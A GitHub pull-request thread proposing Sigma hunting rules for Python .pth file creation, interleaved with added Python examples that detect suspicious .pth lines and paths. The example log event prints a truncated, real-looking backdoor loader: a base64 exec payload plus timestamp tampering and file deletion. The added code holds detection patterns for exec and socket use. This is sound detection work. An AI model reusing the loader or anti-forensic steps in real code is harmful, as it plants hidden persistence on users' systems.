SigmaHQ / sigma

Main Sigma Rule Repository

New analytic for python pth files #4827

Closed netgrain closed 5 months ago

netgrain commented 5 months ago

Summary of the Pull Request

Adds a hunting analytic to detect creation of a Python path configuration file (.pth), which may be indicative of malicious activity such as backdoor creation and persistence.

According to the specification:

An executable line in a .pth file is run at every Python startup, regardless of whether a particular module is actually going to be used. Its impact should thus be kept to a minimum.

Changelog

new: Python Path Configuration File Creation - Linux
new: Python Path Configuration File Creation - Macos
new: Python Path Configuration File Creation - Windows

Example Log Event

File content

import base64 exec(base64.b64decode(b"CgoKZGVmIGNoZWNrKCk6CiAgICBpbXBvcnQgb3Msc3VicHJvY2Vzcyx0aW1lLHN5cwoKCiAgICBkZWYgc3RhcnRfcHJvY2VzcygpOgogICAgICAgIGltcG9ydCBiYXNlNjQKICAgICAgICBmdW5jdGlvbmNvZGUgPSBiIlpHVm1JRjlmYldGcGJpZ3BPZzBLSUNBZ0lHbHRjRzl5ZENCMGFISmxZV1JwYm1jc2RHbHRaU3h2Y3l4eVpTeGlZWE5sTmpRTkNnMEtEUW9OQ2lBZ0lDQmtaV1lnY21WemRHOXlaU2hqYzNOZmNHRjBhQ3hqYjI1MFpXNTBMR0YwYVcxbExHMTBhVzFsS1RvTkNpQWdJQ0FnSUNBZ2FXMXdiM0owSUc5ekxIUnBiV1VOQ2lBZ0lDQWdJQ0FnZEdsdFpTNXpiR1ZsY0NneE5Ta05DaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR056YzE5d1lYUm9MQ2QzSnlrZ1lYTWdaam9OQ2lBZ0lDQWdJQ0FnSUNBZ0lHWXVkM0pwZEdVb1kyOXVkR1Z1ZENrTkNpQWdJQ0FnSUNBZ2IzTXVkWFJwYldVb1kzTnpYM0JoZEdnc0tHRjBhVzFsTEcxMGFXMWxLU2tOQ2lBZ0lDQWdJQ0FnRFFvTkNpQWdJQ0FnSUNBZ0RRb2dJQ0FnWkdWbUlGOWZhWE5mZDJodmJHVmZhRzkxY2lncE9nMEtJQ0FnSUNBZ0lDQm1jbTl0SUdSaGRHVjBhVzFsSUdsdGNHOXlkQ0JrWVhSbGRHbHRaUTBLSUNBZ0lDQWdJQ0JqZFhKeVpXNTBYM1JwYldVZ1BTQmtZWFJsZEdsdFpTNXViM2NvS1M1MGFXMWxLQ2tOQ2lBZ0lDQWdJQ0FnY21WMGRYSnVJR04xY25KbGJuUmZkR2x0WlM1dGFXNTFkR1VnSVQwZ01DQmhibVFnWTNWeWNtVnVkRjkwYVcxbExuTmxZMjl1WkNBOVBT atime=os.path.getatime(os.file) mtime=os.path.getmtime(os.file) os.utime(systempth,(atime,mtime)) os.unlink(file) import glob os.unlink(glob.glob("/opt/pancfg/mgmt/licenses/PA_VM *")[0])
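The quoted specification text is the whole mechanism behind the file content above: CPython's site module treats any .pth line that starts with `import ` as code and executes it at interpreter start. The following is an added example (not code from the PR or from the Sigma project) that applies those parsing rules to constructed .pth contents without executing anything, flags executable lines that look like loaders, and decodes an embedded base64 `exec` payload so an analyst can read it. The sample contents and the `SUSPICIOUS` pattern are assumptions made for the example.

```python
"""Classify .pth lines the way CPython's site.addpackage() does, without
running them. Added example, not code from the SigmaHQ PR."""
import base64
import re

# site.py skips blank lines and '#' comments, exec()s lines that start with
# "import " or "import\t", and treats every other line as a sys.path entry.
IMPORT_PREFIX = ("import ", "import\t")

# Tokens that rarely appear in the benign one-liners a stock install ships
# (setuptools' distutils shim, easy-install) but are typical of a loader.
# Heuristic chosen for this example, not a rule from the PR.
SUSPICIOUS = re.compile(
    r"\b(exec|eval|b64decode|subprocess|os\.system|socket|compile)\b")

B64_LITERAL = re.compile(r"b64decode\(\s*b?['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def classify_pth_lines(text):
    """Return [(kind, line)], kind in {'comment', 'exec', 'path'}."""
    results = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            results.append(("comment", line))
        elif line.startswith(IMPORT_PREFIX):
            results.append(("exec", line))   # runs at every interpreter start
        else:
            results.append(("path", line))   # appended to sys.path
    return results


def suspicious_exec_lines(text):
    """Executable lines that match the loader heuristic."""
    return [line for kind, line in classify_pth_lines(text)
            if kind == "exec" and SUSPICIOUS.search(line)]


def decode_b64_payload(line):
    """Decode the first base64 literal passed to b64decode(), or None."""
    m = B64_LITERAL.search(line)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


# Constructed sample .pth contents (not real files from the PR thread).
BENIGN_PTH = "/usr/lib/python3/dist-packages/mypkg\n# added by packaging\n"
# Modelled on the kind of one-liner setuptools installs by default.
SETUPTOOLS_STYLE_PTH = (
    "import os; enabled = os.environ.get('SETUPTOOLS_USE_DISTUTILS', 'local') "
    "== 'local'; enabled and __import__('_distutils_hack').add_shim();\n")
# Same shape as the backdoor in the PR description; payload is a harmless print.
BACKDOOR_PTH = 'import base64;exec(base64.b64decode(b"cHJpbnQoJ2hpJyk="))\n'

if __name__ == "__main__":
    for name, content in [("benign", BENIGN_PTH),
                          ("setuptools-style", SETUPTOOLS_STYLE_PTH),
                          ("backdoor", BACKDOOR_PTH)]:
        hits = suspicious_exec_lines(content)
        print(name, "->", [decode_b64_payload(h) or h for h in hits])
```

The setuptools-style line is classified as executable but not flagged, which is exactly the false positive discussed further down in the thread: a default installation legitimately ships executable .pth lines, so the creation event alone is only a hunting signal and the file content has to be read.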

nasbench commented 5 months ago

@netgrain any particular reason you didn't create a Windows and macOS variant of this rule?

netgrain commented 5 months ago

@nasbench primarily as I've only seen exploitation of this technique on Linux-based systems, but added a Windows variant now per new commit. Not sure if you'd want macOS separately also? (macOS is not in the folder structure afaik).

Added "related: similar" as meta, but not sure if you'd want this considering the product base is different?

Also: some of the checks fail related to a known FP, which can be filtered, but not sure whether that specific event you're checking for is an exception or a standard across your telemetry base.

nasbench commented 5 months ago

@netgrain those FPs are from a default installation of Python. I excluded them with an additional FP found on test machines.

I updated the regex to include paths without versions and venv folders, as both can exist and are able to load .pth files.
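The path-matching side of the hunt, as an added example that is not the PR's rule text: it runs over constructed file-creation events and shows the cases the thread settles on, namely versioned site-packages, Debian's unversioned dist-packages, venv trees under an arbitrary prefix, Windows `Lib\site-packages`, an allowlist for the default-install FP, and the fact that only files directly inside the site directory are loaded (a .pth in a subdirectory is ignored by the interpreter, so it is not matched). The regex, the event field names (`TargetFilename`, Sysmon-style) and the allowlisted file names are assumptions made for this example.

```python
"""Match .pth creation paths across Linux, macOS and Windows layouts.
Added example; not the regex or filter from the SigmaHQ PR."""
import re

# A .pth is only honoured when it sits directly inside a site directory.
# Accept both separators and any prefix so that /usr/lib/python3.11,
# /usr/lib/python3/dist-packages, $VENV/lib/python3.x and C:\...\Lib all match.
PTH_PATH_RE = re.compile(
    r"(?i)(?:^|[\\/])(?:site|dist)-packages[\\/][^\\/]+\.pth$")

# File names a stock Python/pip/setuptools install writes; assumed allowlist
# standing in for the default-install FP mentioned in the thread.
DEFAULT_INSTALL_PTH = {"distutils-precedence.pth", "easy-install.pth"}


def classify_pth_event(path):
    """'hit' for a loadable .pth outside the allowlist, 'filtered' for an
    allowlisted name, None when the path is not a loadable .pth at all."""
    if not PTH_PATH_RE.search(path):
        return None
    basename = re.split(r"[\\/]", path)[-1]
    if basename.lower() in DEFAULT_INSTALL_PTH:
        return "filtered"
    return "hit"


def hunt(events):
    """Return the TargetFilename of every event that should surface."""
    return [e["TargetFilename"] for e in events
            if classify_pth_event(e["TargetFilename"]) == "hit"]


# Constructed file-creation events (Sysmon EventID 11 shape, not real logs).
SAMPLE_EVENTS = [
    {"os": "linux", "Image": "/usr/bin/python3",
     "TargetFilename": "/usr/lib/python3.11/site-packages/update.pth"},
    {"os": "linux", "Image": "/usr/bin/python3",
     "TargetFilename": "/usr/lib/python3/dist-packages/update.pth"},
    {"os": "linux", "Image": "/home/dev/app/.venv/bin/python",
     "TargetFilename": "/home/dev/app/.venv/lib/python3.12/site-packages/z.pth"},
    {"os": "macos", "Image": "/usr/local/bin/python3",
     "TargetFilename": "/Library/Frameworks/Python.framework/Versions/3.12/lib/python3.12/site-packages/z.pth"},
    {"os": "windows", "Image": "C:\\Python312\\python.exe",
     "TargetFilename": "C:\\Python312\\Lib\\site-packages\\z.pth"},
    {"os": "linux", "Image": "/usr/bin/pip3",   # default-install FP
     "TargetFilename": "/usr/lib/python3.11/site-packages/distutils-precedence.pth"},
    {"os": "linux", "Image": "/usr/bin/python3",   # not in a site dir
     "TargetFilename": "/tmp/notes.pth"},
    {"os": "linux", "Image": "/usr/bin/python3",   # subdirectory: never loaded
     "TargetFilename": "/usr/lib/python3.11/site-packages/pkg/sub.pth"},
]

if __name__ == "__main__":
    for path in hunt(SAMPLE_EVENTS):
        print("pth creation:", path)
```

The allowlist is keyed on file name only, which is deliberate for a hunting rule: a low-and-slow implant could reuse a benign name, so the content check from the earlier example still has to run on anything that creates or rewrites one of those files.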